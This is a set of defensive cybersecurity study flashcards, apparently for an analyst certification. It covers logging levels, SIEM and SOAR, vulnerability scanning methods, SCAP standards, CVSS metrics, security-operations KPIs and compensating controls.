Logging levels refer to the severity or importance of a log message. Common logging levels include the following:
§DEBUG: used for debugging purposes
§INFO: used for informative messages
§WARNING: used to indicate a potential problem
§ERROR: used to indicate a serious problem
§CRITICAL: used to indicate a critical problem
Syslog uses eight logging levels, starting from the most severe (level 0) to the least severe (level 7).
§0 Emergency (emerg): system is unusable.
§1 Alert (alert): immediate action required.
§2 Critical (crit): critical conditions.
§3 Error (error): error conditions.
§4 Warning (warn): warning conditions.
§5 Notice (notice): normal but significant conditions.
§6 Informational (info): informational messages.
§7 Debug (debug): messages helpful for debugging.
Term
Security information and event management (SIEM)
Definition
A solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications.
Security information and event management (SIEM) automates the collection, analysis, and response to security-related data. This automation helps simplify identifying, analyzing, and responding to security threats, especially for events contained within log data.
Term
Security orchestration, automation, and response (SOAR)
Definition
A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment
Security orchestration, automation, and response (SOAR) describes the process of using technology to automate the work of identifying, analyzing, and responding to security threats often flagged by a SIEM.SOAR tools frequently "bolt on" to a SIEM and trigger after an alert is generated. Instead of sending the alert to a security analyst for manual review, the alert is instead forwarded to a SOAR platform. The SOAR performs a series of tasks grouped within preestablished playbooks in response to the alert.
The SOAR extracts relevant fields from the alert and, using scripts or API integrations with other security tools, can evaluate events and data contained within the alert and respond to them accordingly. For well-defined event types, the SOAR can resolve the issue fully. For more complicated events, the SOAR will perform specific automated analyses and include them in a new alert for manual review.The SOAR, when properly implemented, can significantly reduce the number of false positives and the number of mundane tasks performed by security personnel and can also help to reduce the amount of time and manual labor required to monitor and respond to security threats.Additionally, SOAR tools help ensure that security threats are promptly identified and addressed, resulting in more effective mitigations and improved security.
Term
Analyze workflows Identifying Tasks Suitable for Automation
Definition
SOC teams can analyze their workflows to identify repetitive or time-consuming tasks. Tasks that require significant manual efforts, such as data aggregation, correlation, and analysis, are good candidates for automation.
Term
Evaluate time-to-detection Identifying Tasks Suitable for Automation
Definition
SOC teams can evaluate how long it takes them to detect and respond to security incidents. Tasks that contribute to delays in detection or response, such as manual data collection or analysis, are good candidates for automation.
Term
Identify high-risk areas
Identifying Tasks Suitable for Automation
Definition
SOC teams can identify areas of the organization at high risk of a cyber attack. Tasks critical to these areas' security, such as threat hunting or vulnerability scanning, are good candidates for automation.
Term
Consider the frequency of tasks
Identifying Tasks Suitable for Automation
Definition
SOC teams can consider how often they perform specific tasks. Tasks performed frequently, such as log analysis or malware scanning, are good candidates for automation.
Term
Evaluate the benefits of automation
Identifying Tasks Suitable for Automation
Definition
SOC teams can evaluate the benefits of automation for specific tasks, such as increased accuracy, faster response times, and reduced manual effort. Tasks that would benefit from these advantages are good candidates for automation
Term
Orchestrating Threat Intelligence Data
Definition
Data enrichment combines and analyzes data from disparate sources to gain a greater understanding of the threat landscape. This can involve combining different threat feeds to get a complete picture of the malicious actors, tools, and tactics that attackers use. It can also involve correlating data from multiple sources, such as network logs, endpoint data, and threat intelligence feeds, to identify and prioritize threats. By orchestrating threat intelligence data, organizations can better understand the threats they are facing and take preemptive action to protect their networks. With the right processes in place, organizations can effectively create a complete picture of the threat landscape and ensure they take the proper steps to stay ahead of cyber adversaries.
Term
Single pane of glass
Definition
A comprehensive, unified user interface that provides a comprehensive view of an IT environment and allows administrators to manage all connected components from one place. This type of interface simplifies the management of complex IT infrastructures
Term
application programming interface (API)
Definition
Methods exposed by a script or program that allow other scripts or programs to use it. For example, an API enables software developers to access functions of the TCP/IP network stack under a particular operating system.
In this context, an API is a set of functions and procedures that allow two or more applications to communicate with each other. An API defines the types of calls or requests that can be made, how to make them, the data formats that should be used, and the conventions to follow. It can also provide extension mechanisms so that software can extend its existing functionality.
Term
Webhooks
Definition
Automated messages sent from applications to other applications containing information about an event, such as the time it occurred, the data associated with it, and any other relevant information
Term
plugins & add-ons
Definition
Many security tools can have their functionality extended by adding additional features by way of plugins, add-ons, and apps. These additions help to tailor the software product to more closely match the infrastructure being managed from one organization to another. Some additions are free, and many require additional licensing.
Term
National Institute of Standards and Technology (NIST)
Definition
The National Institute of Standards and Technology (NIST) is a nonregulatory agency in the United States that establishes standards and best practices across the entire science and technology field. NIST publishes a wide variety of guidance and best practices within the field of information technology including cybersecurity. Within the field of cybersecurity, the special publication (SP) 800 series documents, as well as the Risk Management Framework and Cybersecurity Framework, are some of the most widely adopted and referenced materials in the industry. More information regarding NIST cybersecurity publications can be obtained via: https://www.nist.gov/cybersecurity.
Term
International Organization for Standardization (ISO)
Definition
Develops many standards and frameworks governing the use of computers, networks, and telecommunications, including ones for information security (27K series) and risk management (31K series).
ISO 27002, which defines security controls; 27017/27018 for cloud security; 27701, which focuses on personal data and privacy; and many others.
Term
Center for Internet Security (CIS) Benchmarks
Definition
The Center for Internet Security (CIS) benchmarks are a set of security configuration best practices developed by a consensus community of experts. They provide a secure baseline configuration for various operating systems, applications, and hardware devices. The benchmarks define best practice approaches to patching, hardening, and system logging and are the industry standard for secure configuration.
Several vulnerability scanners, such as the licensed version of Tenable's Nessus scanner, include configuration scanning options to compare an endpoint's active configuration to the settings detailed in a CIS benchmark.
Term
Open Web Application Security Project (OWASP)
Definition
The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of web applications and services. It is an international organization that provides unbiased, practical information about application security. The OWASP provides tools, documents, and other resources to help people build more secure software.
Term
Payment Card Industry Data Security Standard (PCI DSS)
Definition
Payment Card Industry Data Security Standard (PCI DSS) is a global data protection standard established and maintained by a consortium of payment card companies. PCI DSS identifies controls designed to prevent fraud and protect credit and debit card data. Organizations that take credit and debit cards are required to follow the standards described within the PCI DSS.
Term
Center for Internet Security (CIS)
Definition
A not-for-profit organization (founded partly by SANS). It publishes the well-known "Top 20 Critical Security Controls" (or system design recommendations).
Term
Internal Scans
Definition
internal scans focus on the view from the "inside."
Internal scans are also important to protect systems from abuse from internal threats and to provide layered security. For example, if an attacker makes it past external protections, their job should still be difficult even if they have made it to the "inside." Internal scans should include detailed, comprehensive vulnerability information
Term
External Scans
Definition
External scans focus on the view of devices and services from the "outside" of the network, broadly referring to the Internet
Externally accessible (Internet-facing) systems are continuously pushed, poked, probed, scanned, enumerated, subjected to automated exploits, fingerprinted, and exposed to many other malicious actions. Paying close and careful attention to externally visible vulnerabilities is essential, and the approaches used to address any identified vulnerabilities should be swift
Term
vulnerability scanner
Definition
Hardware or software configured with a list of known weaknesses and exploits and can scan for their presence in a host OS or particular application.
An infrastructure vulnerability scanner is a type of software that scans network hosts (client and servers) and intermediate systems (routers, switches, access points, and firewalls) for data such as patch level, security configuration and policies, network shares, unused accounts, weak passwords, rogue devices, antivirus configuration, and so on. A scanner can be implemented purely as software or as a security appliance connected to the network.
Term
Credentialed/Noncredentialed
Definition
Noncredentialed scans are simple to implement, produce a relatively low impact on the device, and provide insight regarding what vulnerabilities are discoverable to non-authenticated users, for example, someone with access to the network only
Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes. Special care is needed when using credentialed scans, as the most effective scanner credentials also have privileged access. If the scanner does not correctly protect the credentials, or if staff are not careful to protect the credentials, they can be abused or potentially exposed and stolen. Accounts such as root, Domain Administrator, or Administrator are inappropriate for vulnerability scanning. Scanning endpoints should be done with purpose-specific and carefully provisioned credentials, granting only the necessary access.
Term
Agentless Scan
Definition
Agentless scans can be the simplest to implement, as the scanner can collect information from endpoints using protocols such as ssh, WMI, or SNMP. Some organizations do not allow the use of WMI or SNMP in response to risks associated with these protocols. Additionally, collecting data can become complicated when network firewalls are in the line of communication between the vulnerability scanner and the endpoints.
Term
Agent-based Scan
Definition
Agent-based scans require the installation of small, special-purpose software utilities designed to collect information from the endpoint and pass it to the vulnerability scanner. The advantages of agent-based scanning include improved vulnerability and host configuration data, less processing overhead on the vulnerability scanner server, and simplified communication across network firewalls. Agent-based scans require the deployment and installation of the agent software, which requires time and effort to test, deploy, and maintain. Adding agents to endpoints also adds a new attack vector and additional software to track and patch.
Term
Active Scan
Definition
Identifying vulnerabilities can be accomplished in many ways, and a vulnerability scanner is just one of them. Directly interacting with a device or software to identify vulnerabilities is called active scanning. Examples of active scanning include using a vulnerability scanner, enumerating services, performing banner grabbing, content enumeration, or using a web application scanner such as Burp Suite or OWASP ZAP.
Term
Passive Scan
Definition
§Passive scanning describes methods used to identify vulnerabilities without direct interaction with a device or software. The primary example of this is network packet capture. By inspecting the traffic to and from a device, issues such as insecure protocols, cleartext credentials, inadequate encryption methods, DNS query data, and other problems are easily identifiable.
Term
scope of a scan
Definition
The scopeof a scan refers to the range of hosts or subnets included within a single scan job. The scope is configured in the scan as a single IP address or range of IP addresses. For a large network, it is sensible to schedule scans of different portions of the network to occur at different times. This will reduce the impact on network performance and make it easier to analyze the results of each scan. Scans of limited scope can also be used to identify particular issues or meet a particular compliance goal. Asset criticality might also affect scanning scope, with targeted scans of critical assets being scheduled more often.
Term
Map/Discovery Scan
Definition
A map, or discovery, scan identifies the devices connected to a network or network segment. Discovery scans allow security teams to identify connected devices and uncover potential problems.
Term
Fingerprinting
Definition
Identifying the type and version of an operating system (or server application) by analyzing its responses to network scans.
Fingerprinting describes the effort taken to more specifically identify details about a device. Whereas a map or discovery scan looks for connected devices, a fingerprint scan looks to focus attention on an individual device to better understand its purpose, vendor, software versions, configuration details, and the existence of vulnerabilities.
Term
Static analysis
Definition
The process of reviewing uncompiled source code either manually or using automated tools.
Static analysis can be performed in a variety of ways. One method involves manual inspection of source code in order to identify vulnerabilities in programming techniques. Another approach uses specialty applications or add-ons to development tools that are designed to look for well-known programming methods and constructs that are known to be problematic.
Term
Dynamic analysis
Definition
Software testing that examines code behavior during runtime. It helps identify potential security issues, potential performance issues, and other problems
Term
Fuzzing
Definition
A dynamic code analysis technique that involves sending a running application random and unusual input so as to evaluate how the app responds.
Term
Reverse engineering
Definition
The process of analyzing the structure of hardware or software to reveal more about how it functions
Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering's objective is to determine how much information can be extracted from delivered software
Reverse engineering is not limited to software.Hardware can be reverse engineered to better understand how it operates in order to insert malicious components, for the theft of intellectual property, and/or to carefully inspect how a device operates in order to confirm it meets security requirements or to determine if it has been tampered with. Reversing can be performed on all nature of devices, and some examples might include security tokens, computer equipment, network and wireless equipment, cars, wearables, IoT devices, and many others.
Term
Compliance Scans and Regulatory Requirements
Definition
Legal and regulatory environments will usually be accompanied by a security framework or checklist of the controls and configuration settings that must be in place. Security software products such as IDS, SIEM, and vulnerability scanners can often be programmed with compliance templates and scanned for deviations from the template.
Some sources of external compliance may dictate a scanning frequency that your organization must follow; others take a more hands-off approach and simply require that you have a plan in place to scan at certain intervals.
Term
Center for Internet Security
(CIS) benchmarks
Definition
CIS Benchmark configuration guides can be downloaded for free for non-commercial use and include detailed descriptions of all configuration points, although the documents are very lengthy to use in this wayhttps://www.cisecurity.org/cis-benchmarks/. CIS offers a software tool for checking configurations, called CIS CAT, but access to the tool is limited to CIS Members. CIS Benchmarks™ are also available within the professional version of the Tenable Nessus vulnerability scanner, and CIS hardened images are available for deployment within major Cloud platforms, such as AWS or Azure.
Term
Segmentation
Definition
Enforcing a security zone by separating a segment of the network from access by the rest of the network. This could be accomplished using firewalls or VPNs or VLANs. A physically separate network or host (with no cabling or wireless links to other networks) is referred to as air-gapped
Term
segmentation scanning considerations
Definition
This segmentation has a performance benefit and a security benefit because traffic flows between zones are more predictable and easier to monitor and filter. When you perform vulnerability scanning across a segmented network, you need to consider the requirements and limitations:
§A server-based scanner must be able to communicate with remote subnets, possibly including multiple VLANs, and through one or more firewalls. Alternatively, multiple scanning host nodes can be deployed in multiple segments and configured to report back to a central management server.
§An agent-based scanner must be able to communicate reports to the management server.
Term
Performance Considerations
Definition
§Identification of Operating System- Identifying the operating system of the target system is essential to ensure that the correct vulnerability scans used and to identify any unsupported or non-compliant operating system versions.
§Scanning Interval- Scanning should be done regularly to identify new vulnerabilities. Scans should agree on an automated schedule or use specialized agents that support near real-time vulnerability identification.
§Scan Speed - The scan speed is important as it can affect the accuracy of scan results. If a scan is too slow or too fast, it may miss important vulnerabilities and produce inaccurate results or overwhelm the target system resulting in negative performance impacts and downtime.
§Vulnerability Database- The accuracy of the scan results depends on the quality of the vulnerability database used. It is essential to use a comprehensive and up-to-date vulnerability database prior to performing a vulnerability scan.
§Scanning Type- Different types of scans can be performed to identify vulnerabilities in the target system. These include port scans, vulnerability scans, and comprehensive security configuration scans.
§Authentication- Authenticated scans are more comprehensive as they identify vulnerabilities using an authenticated session and have greater access to the host and software for deeper inspection. Unauthenticated scans have less performance impact on the target system but produce limited results compared to authenticated scans.
§False Positives-False positives are sometimes generated when vulnerability scans are performed. False positives represent invalid warnings generated by a scanner and waste the analyst's time researching and verifying the results.
Term
Vulnerability Scan Scheduling
Definition
Scheduling vulnerability scans is essential to maintaining a secure environment and is often required to maintain regulatory compliance. Vulnerability scans help identify system weaknesses that malicious actors may exploit. By scheduling scans regularly, organizations can ensure that any newly discovered vulnerabilities are identified and addressed before they can be exploited. Regular vulnerability scans also help ensure that installed patches are effective and do not introduce new vulnerabilities. Additionally, vulnerability scans help identify misconfigurations and unauthorized changes. Scheduling vulnerability scans is important to ensure that an organization's systems and networks remain secure.
Term
Operations
Definition
Vulnerability scanning can unfortunately cause problems such as negatively impacting a system's performance or causing services to crash. For these reasons, it is important to carefully consider the needs of the organization prior to performing any type of vulnerability scan. It is common for vulnerability scanning activity to follow standard change management procedures to ensure all impacted parties are aware of scanning activity and the potential for problems.
Term
Data Sensitivity Levels
Definition
A data inventory, or data map, describes the mechanisms used to identify and track the data assets created, controlled, or maintained by an organization. The data inventory describes the data in terms of what it contains, such as intellectual property; customer data; third-party, confidential business data; and others, as well as its classification and sensitivity. Having a clear view of data is the first step in protecting it. Gaining full visibility is hindered by the complexity and dynamics of how data is stored as well as obtaining clear information regarding what each piece of identified data represents.
Term
Operational technology (OT)
Definition
Communications network designed to implement an industrial control system rather than data networking.
Operational technology (OT) is a term used to describe the hardware and software technologies used to manage physical devices, processes, and events within an organization. It is the type of technology used to monitor and control actual physical systems, processes, and events in the environment. Examples of OT include industrial control systems, robotics, sensors, Programmable Logic Controllers (PLCs), and SCADA systems, as well as the networks and devices used to operate them.
Term
Industrial control systems (ICSs)
Definition
Network managing embedded devices (computer systems that are designed to perform a specific, dedicated function)
Term
human-machine interfaces (HMIs).
Definition
Input and output controls on a PLC to allow a user to configure and monitor the system.
Term
data historian
Definition
Software that aggregates and catalogs data from multiple sources within an industrial control system.
Term
supervisory control and data acquisition (SCADA)
Definition
Type of industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer
A supervisory control and data acquisition (SCADA) system takes the place of a control server in large-scale, multiple-site ICSs. SCADA typically run as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. SCADA typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices.
Term
Programmable logic controllers (PLCs)
Definition
Type of processor designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems.
Term
Security Content Automation Protocol (SCAP)
Definition
A NIST framework that outlines various accepted practices for automating vulnerability scanning.
Security Content Automation Protocol (SCAP) describes a suite of interoperable specifications designed to standardize the formatting and naming conventions used to identify and report on the presence of software flaws, such as misconfigurations and/or vulnerabilities
Term
Open Vulnerability and Assessment Language (OVAL)
Definition
An XML schema, maintained by MITRE, for describing system security state and querying vulnerability reports and information.
Open Vulnerability and Assessment Language (OVAL)—Helps describe three main aspects of an evaluated system including (1) system information, (2) machine state, and (3) reporting. Using OVAL provides a consistent and interoperable way to collect and assess information regardless of the security tools being used
Term
Asset Reporting Format (ARF)
Definition
As the name suggests, ARF helps to correlate reporting formats to assess information independently from any specific application or vendor product for consistency and interoperability.
Term
Extensible Configuration Checklist Description Format (XCCDF)
Definition
Written in XML, XCCDF provides a consistent and standardized way to define benchmark information as well as configuration and security checks to be performed during an assessment.
Term
Common Platform Enumeration (CPE)
Definition
Scheme for identifying hardware devices, operating systems, and applications developed by MITRE.
Uses a syntax similar to Uniform Resource Identifiers (URI). CPE is a standardized naming format used to identify systems and software.
Term
Common Vulnerabilities and Exposures (CVE)
Definition
Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST
A list of records where each item contains a unique identifier used to describe publicly known vulnerabilities. Unique identifiers begin with CVE, followed by the year of identification, and a unique number - CVE-YEAR-#####.
Term
Common Configuration Enumeration (CCE)
Definition
Scheme for provisioning secure configuration checks across multiple sources developed by MITRE and adopted by NIST.
Similar to CVE, except focused on configuration issues which may result in a vulnerability.
Term
Common Vulnerability Scoring System (CVSS)
Definition
A risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information.
Term
Nessus
Definition
Nessus is a widely used vulnerability assessment tool to identify system vulnerabilities. It also enables organizations to gauge the risk associated with those vulnerabilities based on several factors, including the CVSS score.
Term
OpenSCAP
Definition
OpenSCAP is an open-source scanner used to identify system vulnerabilities. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system.
Term
Qualys
Definition
Qualys is another widely used vulnerability assessment tool to identify system vulnerabilities. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in a system.
Term
OpenVAS
Definition
OpenVAS is an open-source scanner used to identify vulnerabilities in systems. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system.
Term
SecurityScorecard
Definition
SecurityScorecard is a cloud-based solution that enables organizations to assess and improve their security posture. It also provides the ability to calculate a CVSS score based on the vulnerabilities identified in the system
Term
CVSS metrics
Definition
Score
Description
0
None
0.1+
Low
4.0+
Medium
7.0+
High
9.0+
Critical
Term
CVSS Metrics
Definition
Base Metrics
Possible Values
Notes
Attack Vector (AV)
Physical (P), Local (L), Adjacent network (A), or Network (N)
The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) refers to connectivity from any location, whereas Adjacent network (A) describes access via the same broadcast domain. Network attacks include access to a system via the network and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections.
Attack Complexity (AC)
High (H) or Low (L)
Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack. Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater.
Privileges Required (PR)
None (N), Low (L), or High (H)
This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H).
User Interaction (UI)
None (N) or Required (R)
Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment.
Scope (S)
Unchanged (U) or Changed (C)
This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs.
Confidentiality (C), Integrity (I), and Availability (A)
High (H), Low (L), or None (N)
Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad.
Term
Vulnerability Scans
Definition
Vulnerability scans check for open ports, protocol compliance, misconfigured firewalls or routers, unpatched software, cross-site scripting (XSS) problems, SQL injection weaknesses, and many other issues. The vulnerability scanning software creates simple informative output or a formal report identifying the vulnerabilities it discovered. Scan targets can include an individual system, a subnet, or logical grouping of assets, such as database, web, application servers, or perhaps industrial control systems. It is essential to save reports to establish trends over time that demonstrate the effectiveness of the vulnerability management program.
Term
False positive
Definition
When a vulnerability scan incorrectly indicates that a vulnerability or misconfiguration is present when it is not. For example, a scanner may identify that vulnerable software is present on an endpoint, but closer inspection reveals that is not actually installed. This can sometimes happen when software uninstall routines leave traces of the original software. False positives are frustrating and waste valuable analyst time.
Term
True positive
Definition
When a vulnerability scan correctly identifies a vulnerability. For example, a true positive would be when a scan correctly identifies the presence of default credentials on network equipment.
Term
False negative
Definition
When a vulnerability scan incorrectly identifies that a vulnerability does not exist. For example, when a vulnerability scan identifies that a web server is using compliant cipher suites when it is not, if the scanner is misconfigured or uses an outdated signature engine during evaluation. False negatives are the most concerning issue as they represent a failure of the scanning tool to report on a legitimate issue. Using multiple scanning tools can mitigate the risk of false negatives because the scan outputs of each tool can be correlated to identify vulnerabilities more confidently.
Term
True negative
Definition
A vulnerability scan that correctly indicates that a system or device does not have a vulnerability.
Term
Weaponization
Definition
§Assesses the likelihood that an attacker will be able to weaponize a vulnerability to achieve their objectives. This metric considers factors such as the attack vector (AV) and attack complexity (AC) which affect the ease with which an attacker can create a functional exploit. An attacker can easily use weaponized exploits to gain unauthorized access to a system, steal sensitive information, or carry out other malicious activities. Additionally, attackers can easily share weaponized exploits for others to use.
Term
Exploitability
Definition
A vulnerability with high exploitability is more likely to be targeted by an attacker and therefore requires urgent attention. Conversely, a vulnerability with low exploitability may be less urgent as it is less likely to be exploited. The exploitability of a vulnerability depends on many factors, including its attack complexity (AC), the availability of tools and techniques to exploit it (weaponization), and any security measures already in place to defend against the vulnerability. Vulnerability scanning tools and penetration testing can help quantify a vulnerability's exploitability. It is important to note that low exploitability does not mean that a vulnerability is not severe. Analysts must carefully consider all aspects of a vulnerability, including its potential impact, to make informed decisions about remediating it.
Term
zero-day
Definition
A zero-day represents an exploitable vulnerability with no available patch.
The lack of available patch is caused either because the vulnerability is new, and a patch is not yet available, or because the vulnerability is entirely unknown to the software provider.
These vulnerabilities are highly valuable to attackers. Standard vulnerability scanning techniques cannot detect unknown zero-day exploits because the scanner depends upon a vulnerability database of known vulnerabilities.
Term
Asset value
Definition
§An asset's value may influence a vulnerability's score. Highly valuable assets, like those with far-reaching impacts if breached, may have little tolerance for vulnerabilities, skewing all scores into the high/critical range.
Term
CVSS Score Calculations
Categories
Definition
§Impact—The potential damage or harm caused by the vulnerability.
§Exploitability—The ease and likelihood of exploiting a vulnerability.
§Remediation—The cost and effort required to fix the vulnerability.
Term
CVSS Score Calculations
Metrics:
Definition
§Scope—The number of systems and people affected by the vulnerability.
§Confidentiality—The extent to which data is disclosed.
§Integrity—The extent to which the system's functionality is changed or impaired.
§Availability—The extent to which a system is unavailable.
§Privacy—The extent to which the system's privacy is impacted.
§Operations—The extent to which the system's security is affected.
§Other—Any other relevant or important factors.
Term
Vulnerability Management Reporting Benefits
Definition
Increased awareness—A vulnerability management program helps organizations identify potential weaknesses in systems, software, and networks to help organizations reduce their risk of cyberattacks and ensure that the environment remains secure.
Term
Vulnerability Management Reporting Benefits
Improved response
Definition
Organizations can reduce the time it takes to respond to cybersecurity incidents by incorporating vulnerability management into their incident response plan to respond more effectively to cyber threats. For example, using incident response processes to help quickly mitigate newly identified, critical vulnerabilities.
Term
Vulnerability Management Reporting Benefits
Improved security posture
Definition
Vulnerability management reporting provides metrics and measures designed to track the progress and effectiveness of vulnerability management efforts.
Term
Vulnerability Management Reporting Benefits
Better compliance
Definition
Vulnerability management reporting capabilities are required to maintain compliance with regulations, laws, data privacy legislation, and security standards.
Term
Top 10 Lists
Definition
Using top 10 style lists (or top 5, 15, 20, etc.) can help highlight potential problems or focus on important activities, trends, or environmental changes. Some examples of top 10 lists include traffic volume by device, protocols by volume, inbound traffic protocols by volume, outbound protocols, top external IP connections, email volume by user, malware alerts by user, and many other metrics.
Term
Compliance Reports
Definition
Compliance reports provide a detailed overview of how an organization is adhering to the laws, regulations, and standards that apply to its operations. They are typically used to evaluate the effectiveness of an organization's compliance practices, assess the organization's compliance with applicable laws, and provide important information to stakeholders and regulators. Organizations can use compliance reports to demonstrate their commitment to compliance and help ensure that legal and regulatory requirements are being followed.
Term
Regulatory compliance reports
Definition
Prepared by qualified personnel and often include information on policies and procedures, internal audit results, employee training records, risk assessments, and other relevant data. The law, policy, contract, or regulation mandating the compliance report dictates its content.
Term
Internal compliance reports
Definition
Include assessments of endpoints to validate configuration per required secure configuration baselines, employee adherence to established procedures, vendor management practices, change management practices, user account management, and many other areas.
Term
Key Performance Indicators
Definition
KPIs help organizations measure progress toward goals and identify areas for improvement in operations. Any stage of the cybersecurity lifecycle can use KPIs—prevention, detection, or response. KPIs are essential for organizations to understand how their cybersecurity efforts are performing, and they can also use them to determine areas where the organization needs to improve.
KPIs provide this data by tracking metrics, such as the number of security incidents and the time it takes to detect them. KPIs also allow organizations to compare their cybersecurity efforts against other organizations and industry averages. This comparison can help identify where cybersecurity efforts are exceeding expectations and areas where they need to catch up. By tracking KPIs, organizations can determine if additional cybersecurity staff or equipment resources are required or if existing resources are working sufficiently.
Term
Examples of KPIs
Incidents
Definition
This KPI indicates the number of incidents an organization experiences, such as data breaches and cyberattacks. Organizations can track this KPI over time to determine if there is an upward or downward trend in incidents.
Term
Examples of KPIs
Detection Time
Definition
§This KPI indicates the average time it takes to detect incidents. Organizations can use this metric to track how their incident response efforts are improving over time. They can also compare the detection time to industry averages to see where they can improve.
Term
Examples of KPIs
Indicators of Compromise (IoCs)
Definition
§This KPI indicates the number of IoCs that organizations have in their systems and networks or that they have identified in others' systems. Organizations can track this KPI over time to determine if the IoCs are increasing in their environment.
Term
Examples of KPIs
Threats
Definition
§This KPI indicates the number of threats organizations know about and have identified. Organizations can track this KPI over time to determine if the number of threats increases.
Term
Examples of KPIs
Risk Assessment
Definition
§This KPI indicates the organization's risk assessment results. Organizations can compare their risk assessments with those of other organizations to see if they are on par.
Term
Examples of KPIs
Resource Allocation
Definition
This KPI indicates the percentage of cybersecurity resources organizations allocate to different areas, such as prevention and detection. Organizations can track this KPI over time to determine if they are allocating an appropriate percentage of resources to each function.
Term
Service Level Objectives (SLOs)
Definition
Service level objectives (SLOs) are essential in any customer-oriented operation. SLOs provide a benchmark by which security operations can measure their performance and help ensure they meet leadership's expectations. Service level objectives must be measurable, achievable, and realistic, like any goal-setting initiative. This means that security operations teams should set targets that are attainable but also challenging enough to foster growth. Additionally, SLOs should be flexible and adaptable as the cybersecurity landscape and organization's capabilities change over time.
Term
Action Plans
Definition
Action plans provide direction and focus, enabling organizations to achieve strategic goals and objectives. Action plans help frame how to measure progress because they outline the steps, resources, and timelines required to achieve specific goals. Action plans should be tailored to each organization's unique needs and regularly updated to reflect changes in the business environment.
An action plan should begin with a clear statement of the desired outcome followed by a detailed description of the steps and resources needed to reach the desired result. Including measurable goals and objectives in the action plan ensures that leadership can track progress.
Once the action plan is in place, leadership must track progress and adjust the plan as warranted to ensure goals are realistic and achievable. Sometimes tasks progress differently than the original plan. When this happens, it may indicate that the plans need to be adjusted, the time frames are unrealistic, or that additional resources are needed to stay on track.
Action plans are a critical component in response to a vulnerability report. When a vulnerability report identifies that problems exist in the environment, the race is on to implement fixes!
Leadership teams use several approaches to reduce risks, like investing in new security software, making configuration changes, updating policies within an organization, and many other options.
Term
Security Vulnerabilities
Definition
§Unpatched software—Applying the most recent security patches released by the software vendor can mitigate most vulnerabilities.
§Weak passwords—Passwords are often the first line of defense in protecting systems and data. When passwords are easy to guess or crack, they expose systems to unauthorized access.
§Outdated operating systems—Legacy operating systems do not receive security patches and often have many easily exploitable vulnerabilities. Replacing or upgrading operating systems can be difficult, and it is not uncommon to find legacy operating systems still in use by many organizations despite the risks they pose.
§Inadequate infrastructure protection—When firewalls, antimalware tools, and access controls are not correctly configured or maintained, they leave networks vulnerable.
§Misconfigurations—Working under time constraints, staff frequently provision services using default settings, guessing, or using Google for help. Additionally, staff often disable secure settings to resolve problems in response to trouble tickets.
Term
Response to Security Vulnerability
Definition
§Regularly testing systems—It is essential to regularly test systems to ensure they operate correctly and identify potential weaknesses. Testing should include internal and external systems maintained by providers that the organization is dependent on.
§Limiting access—Limiting who has access to systems and networks that store or process sensitive data is an effective way to protect it.
§Monitoring—This includes monitoring internal systems, such as servers, and externally accessible systems, such as web servers. Regularly scanning systems for vulnerabilities and quickly repairing issues is an effective way to guard against data breaches.
Term
Establishing Security Policies
Definition
An essential method to improve security is establishing robust security policies and procedures within an organization. Writing down requirements and expectations in policies and procedures leaves little doubt for staff trying to understand expectations. Additionally, leadership teams can effectively enforce expectations when they are properly documented. Policies and procedures should include everything from the requirement for strong passwords, limiting access to sensitive data, change management, provisioning or de-provisioning software and services, managing user accounts, patching scanning, incident response, and many other areas. It is also critical to regularly evaluate the effectiveness of policies and procedures to ensure that they are working as intended.
Term
Training Staff
Definition
It has been well established that one of the best ways to protect against attacks is to train employees to recognize security issues and know how to respond to them. Awareness and skills development training are essential, but training on existing organizational policies and procedures is also critical. It is also necessary to regularly test employees to ensure they have retained the information or developed the skills addressed in their training.
Term
Software Patching
Definition
Security patches released by developers are often the first line of defense against successfully exploiting software vulnerabilities. It is essential to keep track of patch releases and regularly scan the environment to identify any missing patches. Timely application of patches ensures that software remains secure and up to date. Patches are applied to software using many approaches, including automatic updates, manual installation, and centrally administered patch deployment systems. Automatic updates are highly effective because they ensure that patches are applied as soon as they are released. Despite this, organizations must test most patches before deployment to ensure they do not cause problems or introduce bugs. Manual installation is less effective because patches may not be promptly applied, but this approach offers the highest amount of control.
Term
Compensating Controls
Definition
Compensating controls address security risks when traditional measures, such as software upgrades, multifactor authentication, encryption, and other similar controls, are not viable. This can happen when systems do not support modern security features or when these changes break business-critical operations. Many organizations use complicated and highly integrated systems that are extremely difficult to change, upgrade, and maintain. Compensating controls provide additional layers of security to protect against malicious or accidental breaches.
Compensating controls are typically used when an organization cannot implement a more traditional security measure due to cost, complexity, or other factors. For example, if an organization cannot afford to implement a biometric authentication system, they may instead use compensating controls such as two-factor authentication. Compensating controls can also be used when a security measure is not available, such as in the case of legacy systems.
Compensating controls provide protection when circumstances prevent the use of primary security measures. Compensating controls act as an alternative method of protection. That is not to say that compensating controls cannot, or should not, be used together with primary controls. Compensating controls offer layered protections and keep systems and software safe by providing redundancy. If one control fails, there is another still providing protection.
